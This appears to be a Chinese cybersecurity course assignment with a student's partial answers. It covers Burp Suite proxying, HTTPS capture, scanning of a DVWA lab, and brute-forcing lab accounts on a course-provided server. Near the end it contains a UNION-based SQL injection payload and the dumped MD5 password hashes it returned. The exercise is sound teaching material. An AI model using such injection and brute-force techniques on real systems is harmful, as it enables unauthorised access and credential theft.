9

@所有人网络安全C10-2024.9.21

作业：

1. 安装burp，分别在本机上实现全局代理和局部代理，提供设置过程的说明文档；

在edge浏览器设置全局代理，端口号8888此时股谷歌没有设置代理

1. 利用burp实现对https站点的抓包；

1. 使用Burp的Discover Content功能爬取任意站点的目录，给出爬取过程的说明文档、站点树截图；

1. 分别使用Burp Scan的主动扫描和被动扫描功能对DVWA站点进行扫描，输出扫描报告；

被动扫描

主动扫描

5、Burp Intruder爆破题目

靶场地址：http://42.192.37.16:8082/vulnerabilities/brute/

靶场开放时间：2024.9.21 - 2024.9.28

管理员账号/密码：admin/password

注意事项：爆破成功的同学请勿修改任何账号的密码，以免影响其他同学正常作业！！！

1. 老李今年52岁了，他最近也在学习网络安全，为了方便练习，他在DVWA靶场中增设了一个自己的账号，密码就是他的生日，请你想办法破解出他的账号密码；

（2）Cookie老师在DVWA靶场中设置了一个账号Magedu，且在靶场中的某处存放了一个文件名为mageduC10.txt的密码字典，请你想办法找到该字典并尝试爆破，以获取账号Magedu的正确密码。

Magedu密码

-1' union select group_concat(user),group_concat(password) from users

Surname: 5f4dcc3b5aa765d61d8327deb882cf99,e99a18c428cb38d5f260853678922e03,8d3533d75ae2c3966d7e0d4fcc69216b,0d107d09f5bbe40cade3de5c71e9e9b7,5f4dcc3b5aa765d61d8327deb882cf99,8c2cf247046e40b7c711bc9cc72cf751,e74675e859672140b70b9f2d94099e21

e74675e859672140b70b9f2d94099e21

e74675e859672140b70b9f2d94099e21